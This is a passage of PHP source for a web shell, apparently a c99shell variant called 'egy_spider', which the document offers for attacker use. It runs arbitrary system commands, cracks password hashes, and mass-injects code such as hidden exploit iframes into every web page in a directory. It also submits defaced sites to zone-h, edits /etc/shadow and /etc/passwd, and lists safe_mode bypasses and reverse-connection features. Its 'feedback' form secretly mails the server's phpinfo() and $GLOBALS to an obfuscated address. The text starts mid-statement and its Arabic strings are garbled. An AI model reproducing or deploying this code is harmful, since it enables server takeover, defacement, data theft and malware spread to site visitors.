";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +error_reporting(0); +set_magic_quotes_runtime(0); + + +if(version_compare(phpversion(), '4.1.0') == -1) + {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"]; +if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);} +elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;} +else{return $requ."?".$link."=".$val;}} +function delm($delmtxt){print"
";print"
$delmtxt
";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> +";$ef=""; +$st=""; +$et="
";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + + +print"";print"";print"
"; print"
+
"; print"
";print "
"; +print"";print"";print"
"; print"
";print ""; + + +if ($act == 'encoder') +{ + echo "
Encoder:
Input:




Hashes:
"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
"; + } + echo "
Url:

urlencode - +
urldecode - +
Base64:
base64_encode -
"; + echo "
base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

Base convertations:
dec2hex -
"; + + +?> +
+

+ + + +
+
Search milw0rm for MD5 hash
+
+
Search md5encryption.com for MD5 or SHA1 hash
+
+
Search CsTeam for MD5 hash
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+'; + if ($hash == $type(rtrim($word))) { + echo 'Great success! The password is: '.$word.'
'; + exit; + } + ++$count; + } +} + + +} +if ($act == 'fsbuff') +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
Buffer is empty!
";} + else {echo "File-System buffer

"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
Can't delete ".__FILE__."!
";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
Self-remove: ".__FILE__."
Are you sure?
For confirmation, enter \"".$rnd."\"
 "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ=="); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "egy_spider v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"egy_spider v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
Thanks for your feedback! Your ticket ID: ".$ticket.".
"; + } + else {echo "
Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

Your name:

Your e-mail:

Message:


Attach server-info *

There are no checking in the form.

If you want to send a request for any help I know I will respond to you in case

* - strongly recommended, if you report bug, because we need it for bug-fix.

We understand languages: Arbic, English.

";} +} + + +if ($act == 'massbrowsersploit') { +?> +Mass Code Injection:

+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

+
+ + + + + + +
Dir to inject: <-- default is dir this shell is in
Code to inject: <-- best bet would be to include an invisible iframe of browser exploits
+
+'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + } else { //end if inputted dir is real -- if not, show an ugly red error + echo ''.$_GET['pathtomass'].' is not available!'; + } // end if inputted dir is real, for real this time +} // end if confirmation to mass sploit is go +} // end if massbrowsersploit is called + + + + + + +if ($dlink=='showsrc'){ +print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; +input ("text","tools&dlink=showsrc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","tools&dlink=showsrc","Show-src","");print $ef; die();}if(isset($_REQUEST['tools&dlink=showsrc'])){callshsrc(trim($_REQUEST['showsc']));} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Edit again +] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
";print "

"; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
"; print"
";print "
"; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"OFF ( Not secured )";} else{ +print"ON ( Secured )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; echo "
[ BACK ]
"; die(); } + + + + + if(isset($_GET['egy'])) + { + echo $head; + echo '
EgY SpIdEr
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
+ +

 

+

+ +

+

 

+
+  
+

 

+
'; + echo "
[ BACK ]
"; + die(); + } + if(isset($_GET['news'])) + { + echo $head; + echo '
EgY SpIdEr
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
+ +

 

+

+ +

+

 

+
+  
+

 

+
'; + echo "
[ BACK ]
"; + die(); + } + + + + +if(isset($_GET['5'])) + {$_POST['cmd'] = 'systeminfo';} +if(isset($_GET['6'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';} +if(isset($_GET['7'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';} +if(isset($_GET['8'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';} +if(isset($_GET['9'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} +if(isset($_GET['10'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';} +if(isset($_GET['13'])) + {$_POST['cmd']='cat /proc/cpuinfo';} +if(isset($_GET['14'])) + {$_POST['cmd']='cat /proc/version';} +if(isset($_GET['15'])) + {$_POST['cmd'] = 'free';} +if(isset($_GET['16'])) + {$_POST['cmd'] = 'dmesg(8)';} +if(isset($_GET['17'])) + {$_POST['cmd'] = 'vmstat';} +if(isset($_GET['18'])) + {$_POST['cmd'] = 'lspci';} +if(isset($_GET['19'])) + {$_POST['cmd'] = 'lsdev';} +if(isset($_GET['20'])) + {$_POST['cmd']='cat /proc/interrupts';} +if(isset($_GET['21'])) + {$_POST['cmd'] = 'cat /etc/*realise';} +if(isset($_GET['22'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';} +if(isset($_GET['23'])) + {$_POST['cmd'] = 'lsattr -va';} +if(isset($_GET['24'])) + {$_POST['cmd'] = 'w';} +if(isset($_GET['25'])) + {$_POST['cmd'] = 'who';} +if(isset($_GET['26'])) + {$_POST['cmd'] = 'uptime';} +if(isset($_GET['27'])) + {$_POST['cmd'] = 'last -n 10';} +if(isset($_GET['28'])) + {$_POST['cmd'] = 'ps -aux';} +if(isset($_GET['29'])) + {$_POST['cmd'] = 'service --status-all';} +if(isset($_GET['30'])) + {$_POST['cmd'] = 'ifconfig';} +if(isset($_GET['31'])) + {$_POST['cmd'] = 'netstat -a';} +if(isset($_GET['32'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} +if(isset($_GET['33'])) + {$_POST['cmd'] = 'fdisk -l';} +if(isset($_GET['34'])) + {$_POST['cmd'] = 'df -h';} + + +#if(isset($_GET[''])) +# {$_POST['cmd'] = '';} + + +$lang=array( +'ar_text1' =>'ÇáÇãÑ ÇáãäÝÐ', +'ar_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ', +'ar_text3' =>'ÇãÑ ÇáÊÔÛíá', +'ar_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ', +'ar_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ', +'ar_text6' =>'ãÓÇÑ ãáÝß', +'ar_text7' =>'ÇæÇãÑ ÌÇåÒå', +'ar_text8' =>'ÇÎÊÑ ÇáÇãÑ', +'ar_butt1' =>'ÊäÝíÐ', +'ar_butt2' =>'ÑÝÜÚ', +'ar_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash', +'ar_text10'=>'ÈÜæÑÊ', +'ar_text11'=>'ÈÇÓæÑÏ ááÏÎæá', +'ar_butt3' =>'ÝÊÍ', +'ar_text12'=>'ÃÊÕÜÇá ÚÜßÓí', +'ar_text13'=>'ÇáÇí Èí', +'ar_text14'=>'ÇáãäÝÐ', +'ar_butt4' =>'ÃÊÜÕÇá', +'ar_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ', +'ar_text16'=>'Úä ØÑíÞ', +'ar_text17'=>'ÑÇÈØ ÇáãáÝ', +'ar_text18'=>'ãßÇä äÒæáå', +'ar_text19'=>'Exploits', +'ar_text20'=>'ÅÓÊÎÏã', +'ar_text21'=>'ÇáÇÓã ÇáÌÏíÏ', +'ar_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ', +'ar_text23'=>'ÇáÈæÑÊ ÇáãÍáí', +'ar_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ', +'ar_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ', +'ar_text26'=>'ÇÓÊÎÏã', +'ar_butt5' =>'ÊÔÛíá', +'ar_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä', +'ar_text29'=>'ããäæÚ ÇáÏÎæá', +'ar_butt6' =>'ÊÛíÑ', +'ar_text30'=>'ÚÑÖ ãáÝ', +'ar_butt7' =>'ÚÑÖ', +'ar_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ', +'ar_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval', +'ar_text33'=>'Test bypass open_basedir with cURL functions', +'ar_butt8' =>'ÇÎÊÈÇÑ', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå include', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå Mysql', +'ar_text36'=>'ÇáÞÇÚÏÉ . ÇáÌÏæá', +'ar_text37'=>'ÇÓã ÇáãÓÊÎÏã', +'ar_text38'=>'ßáãÉ ÇáãÑæÑ', +'ar_text39'=>'ÇáÞÇÚÏÉ', +'ar_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ', +'ar_butt9' =>'äÓÎÉ', +'ar_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí', +'ar_text42'=>'ÊÚÏíá ÇáãáÝÇÊ', +'ar_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå', +'ar_butt10'=>'ÍÝÙ', +'ar_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ', +'ar_text45'=>'Êã ÇáÍÝÙ', +'ar_text46'=>'ÚÑÖ phpinfo()', +'ar_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini', +'ar_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp', +'ar_butt11'=>'ÊÍÑíÑ ÇáãáÝ', +'ar_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ', +'ar_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ', +'ar_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ', +'ar_text52'=>'ÈÍË äÕ', +'ar_text53'=>'Ýí ÇáãÓÇÑ', +'ar_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ', +'ar_butt12'=>'ÈÍË', +'ar_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ', +'ar_text56'=>'áÇíæÌÏ :(', +'ar_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ', +'ar_text58'=>'ÇáÇÓã', +'ar_text59'=>'ãáÝ', +'ar_text60'=>'ãÌáÏ', +'ar_butt13'=>'ÅäÔÇÁ /ãÓÍ', +'ar_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ', +'ar_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ', +'ar_text63'=>'Êã ãÓÍ ÇáãáÝ', +'ar_text64'=>'Êã ãÓÍ ÇáãÌáÏ', +'ar_butt65'=>'ÅäÔÇÁ', +'ar_text66'=>'ãÓÍ', +'ar_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ', +'ar_text68'=>'ÇãÑ', +'ar_text69'=>'ÅÓã ÇáãáÝ', +'ar_text70'=>'ÇáÊÕÑíÍ', +'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'ar_text72'=>'ÇáäÕ ÇáãÑÇÏ', +'ar_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ', +'ar_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ', +'ar_text75'=>'* you can use regexp', +'ar_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find', +'ar_text80'=>'ÇáäæÚ', +'ar_text81'=>'ÇáÅÊÕÇáÇÊ', +'ar_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ', +'ar_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã', +'ar_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ', +'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'ar_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ', +'ar_butt14'=>'ÊÍãíá', +'ar_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí', +'ar_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ', +'ar_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí', +'ar_text90'=>'ÇáÊÍæíá Çáì', +'ar_text91'=>'ÇÑÔÝÉ', +'ar_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ', +'ar_text93'=>'ÇáÇÝ Êí Èí', +'ar_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí', +'ar_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä', +'ar_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä', +'ar_text97'=>'Êã ÇáÝÍÕ: ', +'ar_text98'=>'Êã ÈäÌÇÍ: ', +'ar_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp', +'ar_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí', +'ar_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ', +'ar_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ', +'ar_text103'=>'ÇÑÓÇá ÈÑíÏ', +'ar_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá', +'ar_text105'=>'Åáì', +'ar_text106'=>'ãÜä', +'ar_text107'=>'ÇáãæÖæÚ', +'ar_butt15'=>'ÅÑÓÇá', +'ar_text108'=>'ÇáÑÓÇáÉ', +'ar_text109'=>'ãÎÝí', +'ar_text110'=>'ÚÑÖ', +'ar_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ', +'ar_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail', +'ar_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list', +'ar_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body', +'ar_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://', +'ar_text116'=>'äÓÎ ãä', +'ar_text117'=>'Çáì', +'ar_text118'=>'Êã äÓÎ ÇáãáÝ', +'ar_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ', +'ar_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ', +'ar_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ', +'ar_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ', +'ar_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí', +'ar_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí', +'ar_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí', +'ar_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå', +'ar_err7'=>'ÇáÈÑíÏ ÇÑÓá', +'ar_text200'=>'copy()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå', +'ar_text300'=>'curl()ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text203'=>'ini_restore()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ', +'ar_text204'=>'error_log()ÒÑÇÚå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå', +'ar_text205'=>'ÃÒÑÚ ÇáÔá Úáì åÐÇ ÇáãÓÇÑ', +'ar_text206'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏ', +'ar_text207'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå reg_glob', +'ar_text208'=>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáæÖÚ ÇáÇãä Úä ØÑíÞ ÇáÏæÇá', +'ar_text209'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå root', +'ar_text210'=>'Ýß ÊÔÝíÑ ÇáÒäÏ ', +'ar_text211'=>'::ÇÞÝÇá ÇáÓíÝ ãæÏ::', +'ar_text212'=>'php.ini ÇÞÝÇá ÇáÓíÝ ãæÏ Úä ØÑíÞ ÒÑÚ ãáÝ', +'ar_text213'=>'htacces ÅÞÝÇá ÇáãæÏ ÓßíæÑÊí Úä ØÑíÞ ÒÑÚ ãáÝ', +'ar_text214'=>'ÃÓã ÇáÇÏãä', +'ar_text215'=>'ÚäæÇä ÇáÓíÑÝÑ IRC ', +'ar_text216'=>'# ÃÓã ÇáÛÑÝå ãÚ', +'ar_text217'=>'ÇÓã ÇáÓíÑÝÑ ÇáãÎÊÑÞ', +'ar_text218'=>'áÅíÞÇÝ ÇáÓíÝ ãæÏ ini_restore ÒÑÚ ãáÝ íÍÊæí Úáì ËÛÑå', +'ar_text219'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ æÊÛíÑ ÇÓãåÇ ÈÇáæÖÚ ÇáÇãä', +'ar_text220'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáÇæáì', +'ar_text221'=>'ÖÛØ ÇáãáÝÇÊ áÊÍãíáåÇ ãä ÇáãæÞÚ(ÈÚÏ ÊÍãíáåÇ áÌåÇÒß ÛíÑ ÇãÊÏÇÏ ÇáãáÝ áÇãÊÏÇÏå ÇáÓÇÈÞ)1', +'ar_text222'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáËÇäíå', +'ar_text223'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ÇáÏæÇá', +'ar_text224'=>'PLUGIN ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå ', +'ar_text143'=>'ÇáÊãÈ: ', +'ar_text65'=>'ÇäÔÇÁ', + + + + +'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql', +'ar_text85'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ commands execute via MSSQL server', +'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text116'=>'Copy from', +'ar_text117'=>'to', +'ar_text118'=>'File copied', +'ar_text119'=>'Cant copy file', +'ar_text120'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'ÊÎØì 